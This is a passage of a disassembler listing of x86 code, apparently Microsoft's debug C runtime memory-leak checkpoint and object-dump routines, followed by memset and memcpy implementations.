mov edx, [ebp+10h]
mov eax, [ebp-4]
mov ecx, [eax+18h]
mov [edx], ecx
loc_418160: ; CODE XREF: .text:00418153�j
cmp dword ptr [ebp+14h], 0
jz short loc_418171
mov edx, [ebp+14h]
mov eax, [ebp-4]
mov ecx, [eax+8]
mov [edx], ecx
loc_418171: ; CODE XREF: .text:00418164�j
cmp dword ptr [ebp+18h], 0
jz short loc_418182
mov edx, [ebp+18h]
mov eax, [ebp-4]
mov ecx, [eax+0Ch]
mov [edx], ecx
loc_418182: ; CODE XREF: .text:00418175�j
push 9
call sub_41BD30
add esp, 4
mov eax, 1
jmp short loc_41819F
; ---------------------------------------------------------------------------
loc_418193: ; CODE XREF: .text:0041811E�j
; .text:00418134�j ...
push 9
call sub_41BD30
add esp, 4
xor eax, eax
loc_41819F: ; CODE XREF: .text:004180D6�j
; .text:00418191�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, dword_493798
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_493798, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4181D0 proc near ; CODE XREF: sub_418850+D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_41820A
loc_4181DF: ; CODE XREF: sub_4181D0+33�j
push offset a_crtmemcheckpo ; "_CrtMemCheckPoint: NULL state pointer.\n"...
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_4181FF
int 3 ; Trap to Debugger
loc_4181FF: ; CODE XREF: sub_4181D0+2C�j
xor eax, eax
test eax, eax
jnz short loc_4181DF
jmp loc_418333
; ---------------------------------------------------------------------------
loc_41820A: ; CODE XREF: sub_4181D0+D�j
push 9
call sub_41BC90
add esp, 4
mov ecx, [ebp+arg_0]
mov edx, dword_492064
mov [ecx], edx
mov [ebp+var_4], 0
jmp short loc_418231
; ---------------------------------------------------------------------------
loc_418228: ; CODE XREF: sub_4181D0+83�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_418231: ; CODE XREF: sub_4181D0+56�j
cmp [ebp+var_4], 5
jge short loc_418255
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov dword ptr [edx+ecx*4+18h], 0
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+eax*4+4], 0
jmp short loc_418228
; ---------------------------------------------------------------------------
loc_418255: ; CODE XREF: sub_4181D0+65�j
mov edx, dword_492064
mov [ebp+var_8], edx
jmp short loc_418268
; ---------------------------------------------------------------------------
loc_418260: ; CODE XREF: sub_4181D0:loc_41830C�j
mov eax, [ebp+var_8]
mov ecx, [eax]
mov [ebp+var_8], ecx
loc_418268: ; CODE XREF: sub_4181D0+8E�j
cmp [ebp+var_8], 0
jz loc_418311
mov edx, [ebp+var_8]
mov eax, [edx+14h]
and eax, 0FFFFh
test eax, eax
jl short loc_4182E7
mov ecx, [ebp+var_8]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 5
jge short loc_4182E7
mov eax, [ebp+var_8]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, [ebp+arg_0]
mov eax, [edx+ecx*4+4]
add eax, 1
mov ecx, [ebp+var_8]
mov edx, [ecx+14h]
and edx, 0FFFFh
mov ecx, [ebp+arg_0]
mov [ecx+edx*4+4], eax
mov edx, [ebp+var_8]
mov eax, [edx+14h]
and eax, 0FFFFh
mov ecx, [ebp+arg_0]
mov edx, [ecx+eax*4+18h]
mov eax, [ebp+var_8]
add edx, [eax+10h]
mov ecx, [ebp+var_8]
mov eax, [ecx+14h]
and eax, 0FFFFh
mov ecx, [ebp+arg_0]
mov [ecx+eax*4+18h], edx
jmp short loc_41830C
; ---------------------------------------------------------------------------
loc_4182E7: ; CODE XREF: sub_4181D0+AF�j
; sub_4181D0+C0�j ...
mov edx, [ebp+var_8]
push edx
push offset aBadMemoryBlock ; "Bad memory block found at 0x%08X.\n"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_418306
int 3 ; Trap to Debugger
loc_418306: ; CODE XREF: sub_4181D0+133�j
xor eax, eax
test eax, eax
jnz short loc_4182E7
loc_41830C: ; CODE XREF: sub_4181D0+115�j
jmp loc_418260
; ---------------------------------------------------------------------------
loc_418311: ; CODE XREF: sub_4181D0+9C�j
mov ecx, [ebp+arg_0]
mov edx, dword_49206C
mov [ecx+2Ch], edx
mov eax, [ebp+arg_0]
mov ecx, dword_492060
mov [eax+30h], ecx
push 9
call sub_41BD30
add esp, 4
loc_418333: ; CODE XREF: sub_4181D0+35�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4181D0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
mov dword ptr [ebp-8], 0
cmp dword ptr [ebp+8], 0
jz short loc_418362
cmp dword ptr [ebp+0Ch], 0
jz short loc_418362
cmp dword ptr [ebp+10h], 0
jnz short loc_418390
loc_418362: ; CODE XREF: .text:00418354�j
; .text:0041835A�j ...
push offset a_crtmemdiffere ; "_CrtMemDifference: NULL state pointer.\n"...
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_418382
int 3 ; Trap to Debugger
loc_418382: ; CODE XREF: .text:0041837F�j
xor eax, eax
test eax, eax
jnz short loc_418362
mov eax, [ebp-8]
jmp loc_41845C
; ---------------------------------------------------------------------------
loc_418390: ; CODE XREF: .text:00418360�j
mov dword ptr [ebp-4], 0
jmp short loc_4183A2
; ---------------------------------------------------------------------------
loc_418399: ; CODE XREF: .text:loc_418427�j
mov ecx, [ebp-4]
add ecx, 1
mov [ebp-4], ecx
loc_4183A2: ; CODE XREF: .text:00418397�j
cmp dword ptr [ebp-4], 5
jge loc_41842C
mov edx, [ebp-4]
mov eax, [ebp+10h]
mov ecx, [ebp-4]
mov esi, [ebp+0Ch]
mov edx, [eax+edx*4+18h]
sub edx, [esi+ecx*4+18h]
mov eax, [ebp-4]
mov ecx, [ebp+8]
mov [ecx+eax*4+18h], edx
mov edx, [ebp-4]
mov eax, [ebp+10h]
mov ecx, [ebp-4]
mov esi, [ebp+0Ch]
mov edx, [eax+edx*4+4]
sub edx, [esi+ecx*4+4]
mov eax, [ebp-4]
mov ecx, [ebp+8]
mov [ecx+eax*4+4], edx
mov edx, [ebp-4]
mov eax, [ebp+8]
cmp dword ptr [eax+edx*4+18h], 0
jnz short loc_418402
mov ecx, [ebp-4]
mov edx, [ebp+8]
cmp dword ptr [edx+ecx*4+4], 0
jz short loc_418427
loc_418402: ; CODE XREF: .text:004183F3�j
cmp dword ptr [ebp-4], 0
jz short loc_418427
cmp dword ptr [ebp-4], 2
jnz short loc_418420
cmp dword ptr [ebp-4], 2
jnz short loc_418427
mov eax, dword_442C00
and eax, 10h
test eax, eax
jz short loc_418427
loc_418420: ; CODE XREF: .text:0041840C�j
mov dword ptr [ebp-8], 1
loc_418427: ; CODE XREF: .text:00418400�j
; .text:00418406�j ...
jmp loc_418399
; ---------------------------------------------------------------------------
loc_41842C: ; CODE XREF: .text:004183A6�j
mov ecx, [ebp+10h]
mov edx, [ebp+0Ch]
mov eax, [ecx+2Ch]
sub eax, [edx+2Ch]
mov ecx, [ebp+8]
mov [ecx+2Ch], eax
mov edx, [ebp+10h]
mov eax, [ebp+0Ch]
mov ecx, [edx+30h]
sub ecx, [eax+30h]
mov edx, [ebp+8]
mov [edx+30h], ecx
mov eax, [ebp+8]
mov dword ptr [eax], 0
mov eax, [ebp-8]
loc_41845C: ; CODE XREF: .text:0041838B�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418470 proc near ; CODE XREF: sub_418850+5C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_8], 0
push 9
call sub_41BC90
add esp, 4
loc_41848A: ; CODE XREF: sub_418470+3E�j
push offset aDumpingObjects ; "Dumping objects ->\n"
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_4184AA
int 3 ; Trap to Debugger
loc_4184AA: ; CODE XREF: sub_418470+37�j
xor eax, eax
test eax, eax
jnz short loc_41848A
cmp [ebp+arg_0], 0
jz short loc_4184BE
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [ebp+var_8], edx
loc_4184BE: ; CODE XREF: sub_418470+44�j
mov eax, dword_492064
mov [ebp+var_4], eax
jmp short loc_4184D0
; ---------------------------------------------------------------------------
loc_4184C8: ; CODE XREF: sub_418470:loc_4186ED�j
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov [ebp+var_4], edx
loc_4184D0: ; CODE XREF: sub_418470+56�j
cmp [ebp+var_4], 0
jz loc_4186F2
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jz loc_4186F2
mov ecx, [ebp+var_4]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 3
jz short loc_418524
mov eax, [ebp+var_4]
mov ecx, [eax+14h]
and ecx, 0FFFFh
test ecx, ecx
jz short loc_418524
mov edx, [ebp+var_4]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jnz short loc_418529
mov ecx, dword_442C00
and ecx, 10h
test ecx, ecx
jnz short loc_418529
loc_418524: ; CODE XREF: sub_418470+85�j
; sub_418470+95�j
jmp loc_4186ED
; ---------------------------------------------------------------------------
loc_418529: ; CODE XREF: sub_418470+A5�j
; sub_418470+B2�j
mov edx, [ebp+var_4]
cmp dword ptr [edx+8], 0
jz short loc_4185A2
push 0
push 1
mov eax, [ebp+var_4]
mov ecx, [eax+8]
push ecx
call sub_417FE0
add esp, 0Ch
test eax, eax
jnz short loc_418573
loc_418549: ; CODE XREF: sub_418470+FF�j
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
push eax
push offset aFileErrorD ; "#File Error#(%d) : "
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_41856B
int 3 ; Trap to Debugger
loc_41856B: ; CODE XREF: sub_418470+F8�j
xor ecx, ecx
test ecx, ecx
jnz short loc_418549
jmp short loc_4185A2
; ---------------------------------------------------------------------------
loc_418573: ; CODE XREF: sub_418470+D7�j
; sub_418470+130�j
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
push eax
mov ecx, [ebp+var_4]
mov edx, [ecx+8]
push edx
push offset aHsD ; "%hs(%d) : "
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 1Ch
cmp eax, 1
jnz short loc_41859C
int 3 ; Trap to Debugger
loc_41859C: ; CODE XREF: sub_418470+129�j
xor eax, eax
test eax, eax
jnz short loc_418573
loc_4185A2: ; CODE XREF: sub_418470+C0�j
; sub_418470+101�j ...
mov ecx, [ebp+var_4]
mov edx, [ecx+18h]
push edx
push offset aLd ; "{%ld} "
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_4185C4
int 3 ; Trap to Debugger
loc_4185C4: ; CODE XREF: sub_418470+151�j
xor eax, eax
test eax, eax
jnz short loc_4185A2
mov ecx, [ebp+var_4]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 4
jnz short loc_41864C
loc_4185DB: ; CODE XREF: sub_418470+1A7�j
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
push ecx
mov edx, [ebp+var_4]
mov eax, [edx+14h]
sar eax, 10h
and eax, 0FFFFh
push eax
mov ecx, [ebp+var_4]
add ecx, 20h
push ecx
push offset aClientBlockAt0 ; "client block at 0x%08X, subtype %x, %u "...
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 20h
cmp eax, 1
jnz short loc_418613
int 3 ; Trap to Debugger
loc_418613: ; CODE XREF: sub_418470+1A0�j
xor edx, edx
test edx, edx
jnz short loc_4185DB
cmp dword_493798, 0
jz short loc_41863B
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
push ecx
mov edx, [ebp+var_4]
add edx, 20h
push edx
call dword_493798
add esp, 8
jmp short loc_418647
; ---------------------------------------------------------------------------
loc_41863B: ; CODE XREF: sub_418470+1B0�j
mov eax, [ebp+var_4]
push eax
call sub_418730
add esp, 4
loc_418647: ; CODE XREF: sub_418470+1C9�j
jmp loc_4186ED
; ---------------------------------------------------------------------------
loc_41864C: ; CODE XREF: sub_418470+169�j
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+14h], 1
jnz short loc_418692
loc_418655: ; CODE XREF: sub_418470+212�j
mov edx, [ebp+var_4]
mov eax, [edx+10h]
push eax
mov ecx, [ebp+var_4]
add ecx, 20h
push ecx
push offset aNormalBlockAt0 ; "normal block at 0x%08X, %u bytes long.\n"...
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 1Ch
cmp eax, 1
jnz short loc_41867E
int 3 ; Trap to Debugger
loc_41867E: ; CODE XREF: sub_418470+20B�j
xor edx, edx
test edx, edx
jnz short loc_418655
mov eax, [ebp+var_4]
push eax
call sub_418730
add esp, 4
jmp short loc_4186ED
; ---------------------------------------------------------------------------
loc_418692: ; CODE XREF: sub_418470+1E3�j
mov ecx, [ebp+var_4]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 2
jnz short loc_4186ED
loc_4186A3: ; CODE XREF: sub_418470+26F�j
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
push ecx
mov edx, [ebp+var_4]
mov eax, [edx+14h]
sar eax, 10h
and eax, 0FFFFh
push eax
mov ecx, [ebp+var_4]
add ecx, 20h
push ecx
push offset aCrtBlockAt0x08 ; "crt block at 0x%08X, subtype %x, %u byt"...
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 20h
cmp eax, 1
jnz short loc_4186DB
int 3 ; Trap to Debugger
loc_4186DB: ; CODE XREF: sub_418470+268�j
xor edx, edx
test edx, edx
jnz short loc_4186A3
mov eax, [ebp+var_4]
push eax
call sub_418730
add esp, 4
loc_4186ED: ; CODE XREF: sub_418470:loc_418524�j
; sub_418470:loc_418647�j ...
jmp loc_4184C8
; ---------------------------------------------------------------------------
loc_4186F2: ; CODE XREF: sub_418470+64�j
; sub_418470+70�j
push 9
call sub_41BD30
add esp, 4
loc_4186FC: ; CODE XREF: sub_418470+2B0�j
push offset aObjectDumpComp ; "Object dump complete.\n"
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_41871C
int 3 ; Trap to Debugger
loc_41871C: ; CODE XREF: sub_418470+2A9�j
xor ecx, ecx
test ecx, ecx
jnz short loc_4186FC
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_418470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418730 proc near ; CODE XREF: sub_418470+1CF�p
; sub_418470+218�p ...
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_34 = byte ptr -34h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov [ebp+var_4C], 0
jmp short loc_41874B
; ---------------------------------------------------------------------------
loc_418742: ; CODE XREF: sub_418730+D7�j
mov eax, [ebp+var_4C]
add eax, 1
mov [ebp+var_4C], eax
loc_41874B: ; CODE XREF: sub_418730+10�j
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+10h], 10h
jge short loc_41875F
mov edx, [ebp+arg_0]
mov eax, [edx+10h]
mov [ebp+var_54], eax
jmp short loc_418766
; ---------------------------------------------------------------------------
loc_41875F: ; CODE XREF: sub_418730+22�j
mov [ebp+var_54], 10h
loc_418766: ; CODE XREF: sub_418730+2D�j
mov ecx, [ebp+var_4C]
cmp ecx, [ebp+var_54]
jge loc_41880C
mov edx, [ebp+arg_0]
add edx, [ebp+var_4C]
mov al, [edx+20h]
mov byte ptr [ebp+var_50], al
cmp dword_442F58, 1
jle short loc_4187A3
push 157h
mov ecx, [ebp+var_50]
and ecx, 0FFh
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_58], eax
jmp short loc_4187C0
; ---------------------------------------------------------------------------
loc_4187A3: ; CODE XREF: sub_418730+55�j
mov edx, [ebp+var_50]
and edx, 0FFh
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 157h
mov [ebp+var_58], ecx
loc_4187C0: ; CODE XREF: sub_418730+71�j
cmp [ebp+var_58], 0
jz short loc_4187D4
mov edx, [ebp+var_50]
and edx, 0FFh
mov [ebp+var_5C], edx
jmp short loc_4187DB
; ---------------------------------------------------------------------------
loc_4187D4: ; CODE XREF: sub_418730+94�j
mov [ebp+var_5C], 20h
loc_4187DB: ; CODE XREF: sub_418730+A2�j
mov eax, [ebp+var_4C]
mov cl, byte ptr [ebp+var_5C]
mov [ebp+eax+var_48], cl
mov edx, [ebp+var_50]
and edx, 0FFh
push edx
push offset a_2x ; "%.2X "
mov eax, [ebp+var_4C]
imul eax, 3
lea ecx, [ebp+eax+var_34]
push ecx
call sub_418D70
add esp, 0Ch
jmp loc_418742
; ---------------------------------------------------------------------------
loc_41880C: ; CODE XREF: sub_418730+3C�j
mov edx, [ebp+var_4C]
mov [ebp+edx+var_48], 0
loc_418814: ; CODE XREF: sub_418730+10B�j
lea eax, [ebp+var_34]
push eax
lea ecx, [ebp+var_48]
push ecx
push offset aDataSS ; " Data: <%s> %s\n"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 1Ch
cmp eax, 1
jnz short loc_418837
int 3 ; Trap to Debugger
loc_418837: ; CODE XREF: sub_418730+104�j
xor edx, edx
test edx, edx
jnz short loc_418814
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_418730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418850 proc near ; CODE XREF: sub_41B390+B9�p
var_34 = byte ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
lea eax, [ebp+var_34]
push eax
call sub_4181D0
add esp, 4
cmp [ebp+var_20], 0
jnz short loc_418884
cmp [ebp+var_2C], 0
jnz short loc_418884
mov ecx, dword_442C00
and ecx, 10h
test ecx, ecx
jz short loc_4188BB
cmp [ebp+var_28], 0
jz short loc_4188BB
loc_418884: ; CODE XREF: sub_418850+19�j
; sub_418850+1F�j ...
push offset aDetectedMemory ; "Detected memory leaks!\n"
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_4188A4
int 3 ; Trap to Debugger
loc_4188A4: ; CODE XREF: sub_418850+51�j
xor edx, edx
test edx, edx
jnz short loc_418884
push 0
call sub_418470
add esp, 4
mov eax, 1
jmp short loc_4188BD
; ---------------------------------------------------------------------------
loc_4188BB: ; CODE XREF: sub_418850+2C�j
; sub_418850+32�j
xor eax, eax
loc_4188BD: ; CODE XREF: sub_418850+69�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_418850 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
cmp dword ptr [ebp+8], 0
jnz short loc_4188E2
jmp loc_41898E
; ---------------------------------------------------------------------------
loc_4188E2: ; CODE XREF: .text:004188DB�j
mov dword ptr [ebp-4], 0
jmp short loc_4188F4
; ---------------------------------------------------------------------------
loc_4188EB: ; CODE XREF: .text:0041893C�j
mov eax, [ebp-4]
add eax, 1
mov [ebp-4], eax
loc_4188F4: ; CODE XREF: .text:004188E9�j
cmp dword ptr [ebp-4], 5
jge short loc_41893E
loc_4188FA: ; CODE XREF: .text:0041893A�j
mov ecx, [ebp-4]
mov edx, off_442C10[ecx*4]
push edx
mov eax, [ebp-4]
mov ecx, [ebp+8]
mov edx, [ecx+eax*4+4]
push edx
mov eax, [ebp-4]
mov ecx, [ebp+8]
mov edx, [ecx+eax*4+18h]
push edx
push offset aLdBytesInLdHsB ; "%ld bytes in %ld %hs Blocks.\n"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 20h
cmp eax, 1
jnz short loc_418936
int 3 ; Trap to Debugger
loc_418936: ; CODE XREF: .text:00418933�j
xor eax, eax
test eax, eax
jnz short loc_4188FA
jmp short loc_4188EB
; ---------------------------------------------------------------------------
loc_41893E: ; CODE XREF: .text:004188F8�j
; .text:00418964�j
mov ecx, [ebp+8]
mov edx, [ecx+2Ch]
push edx
push offset aLargestNumberU ; "Largest number used: %ld bytes.\n"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_418960
int 3 ; Trap to Debugger
loc_418960: ; CODE XREF: .text:0041895D�j
xor eax, eax
test eax, eax
jnz short loc_41893E
loc_418966: ; CODE XREF: .text:0041898C�j
mov ecx, [ebp+8]
mov edx, [ecx+30h]
push edx
push offset aTotalAllocatio ; "Total allocations: %ld bytes.\n"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_418988
int 3 ; Trap to Debugger
loc_418988: ; CODE XREF: .text:00418985�j
xor eax, eax
test eax, eax
jnz short loc_418966
loc_41898E: ; CODE XREF: .text:004188DD�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4189A0 proc near ; CODE XREF: sub_40119E+63�p
; sub_40119E+B2�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4189F3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4189E7
neg ecx
and ecx, 3
jz short loc_4189C9
sub edx, ecx
loc_4189C3: ; CODE XREF: sub_4189A0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4189C3
loc_4189C9: ; CODE XREF: sub_4189A0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4189E7
rep stosd
test edx, edx
jz short loc_4189ED
loc_4189E7: ; CODE XREF: sub_4189A0+18�j
; sub_4189A0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4189E7
loc_4189ED: ; CODE XREF: sub_4189A0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4189F3: ; CODE XREF: sub_4189A0+A�j
mov eax, [esp+arg_0]
retn
sub_4189A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A00 proc near ; CODE XREF: sub_40119E+54�p
; sub_40119E+77�p ...
var_733BFFC7 = byte ptr -733BFFC7h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_418A20
cmp edi, eax
jb loc_418B98
loc_418A20: ; CODE XREF: sub_418A00+16�j
test edi, 3
jnz short loc_418A3C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_418A5C
rep movsd
jmp ds:off_418B48[edx*4]
; ---------------------------------------------------------------------------
loc_418A3C: ; CODE XREF: sub_418A00+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_418A54
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_418A5C+4[eax*4]
; ---------------------------------------------------------------------------
loc_418A54: ; CODE XREF: sub_418A00+46�j
jmp dword ptr ds:loc_418B58[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_418A5C: ; CODE XREF: sub_418A00+31�j
; sub_418A00+8E�j ...
jmp ds:off_418ADC[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_418A6C+4
; ---------------------------------------------------------------------------
pushf
mov al, [ecx+0]
loc_418A6C: ; DATA XREF: sub_418A00+64�o
ror byte ptr [edx-2EDCFFBFh], 8Ah
push es
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_418A5C
rep movsd
jmp ds:off_418B48[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_418A5C
rep movsd
jmp ds:off_418B48[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_418A5C
rep movsd
jmp ds:off_418B48[edx*4]
; ---------------------------------------------------------------------------
align 4
off_418ADC dd offset loc_418B3F ; DATA XREF: sub_418A00:loc_418A5C�r
dd offset loc_418B2C
dd offset loc_418B24
dd offset loc_418B1C
dd offset loc_418B14
dd offset loc_418B0C
dd offset loc_418B04
dd offset loc_418AFC
; ---------------------------------------------------------------------------
loc_418AFC: ; CODE XREF: sub_418A00:loc_418A5C�j
; DATA XREF: sub_418A00+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_418B04: ; CODE XREF: sub_418A00:loc_418A5C�j
; DATA XREF: sub_418A00+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_418B0C: ; CODE XREF: sub_418A00:loc_418A5C�j
; DATA XREF: sub_418A00+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_418B14: ; CODE XREF: sub_418A00:loc_418A5C�j
; DATA XREF: sub_418A00+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_418B1C: ; CODE XREF: sub_418A00:loc_418A5C�j
; DATA XREF: sub_418A00+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_418B24: ; CODE XREF: sub_418A00:loc_418A5C�j
; DATA XREF: sub_418A00+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_418B2C: ; CODE XREF: sub_418A00:loc_418A5C�j
; DATA XREF: sub_418A00+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_418B3F: ; CODE XREF: sub_418A00:loc_418A5C�j
; DATA XREF: sub_418A00:off_418ADC�o
jmp ds:off_418B48[edx*4]
; ---------------------------------------------------------------------------
align 4
off_418B48 dd offset loc_418B58 ; DATA XREF: sub_418A00+35�r
; sub_418A00+92�r ...
dd offset loc_418B60
dd offset loc_418B6C
dd offset loc_418B80
; ---------------------------------------------------------------------------
loc_418B58: ; CODE XREF: sub_418A00+35�j
; sub_418A00+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_418B60: ; CODE XREF: sub_418A00+35�j
; sub_418A00+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_418B6C: ; CODE XREF: sub_418A00+35�j
; sub_418A00+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_418B80: ; CODE XREF: sub_418A00+35�j
; sub_418A00+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_418B98: ; CODE XREF: sub_418A00+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_418BCC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_418BC0
std
rep movsd
cld
jmp ds:off_418CE0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_418BC0: ; CODE XREF: sub_418A00+1B1�j
; sub_418A00+208�j ...
neg ecx
jmp dword ptr ds:loc_418C8F+1[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_418BCC: ; CODE XREF: sub_418A00+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_418BE4
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_418BE4+4[eax*4]
; ---------------------------------------------------------------------------
loc_418BE4: ; CODE XREF: sub_418A00+1D6�j
; DATA XREF: sub_418A00+1DD�r
jmp ds:off_418CE0[ecx*4]
; ---------------------------------------------------------------------------
align 4
clc
mov eax, [ecx+0]
sbb [ecx+eax*2+418C4000h], cl
